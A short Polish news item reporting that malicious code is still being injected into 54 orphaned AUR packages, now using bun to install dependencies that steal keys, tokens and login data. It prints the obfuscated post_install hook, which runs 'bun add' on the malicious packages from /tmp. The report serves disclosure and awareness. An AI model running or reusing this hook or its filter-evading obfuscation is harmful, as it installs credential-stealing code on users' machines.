Pomimo działań podjętych przez twórców Arch Linux, wprowadzanie złośliwego kodu do repozytoriów AUR (Arch User Repository) wciąż trwa. Kilka godzin temu złośliwy kod został dodany do kolejnych 54 pakietów, które nie mają maintainerów (historia odrzucenia złośliwych zmian). W przeciwieństwie do ataków sprzed dwóch dni, tym razem do złośliwego instalowania zależności wykorzystano platformę bun zamiast menedżera pakietów npm. Aby obejść wprowadzone filtry, do funkcji post_install dodawany jest zafundowany łańcuch, w którym wywoływana jest komenda „bun add” do instalacji pakietów z złośliwym kodem skanującym i wysyłającym na zewnątrz serwer kluczy, tokenów i danych logowania.
post_install() {
$’\x63′»d» «/»‘t'»m»‘p’ && «b»‘u»n’ ‘a'»d»‘d’ $’\141\x6e»s'»i»»-«$’\143»o»l»o»r’$’\x73′ ‘n'»e»‘x'»t»»f»‘i»l»e»-»j»s’
}
Źródło: opennet.ru
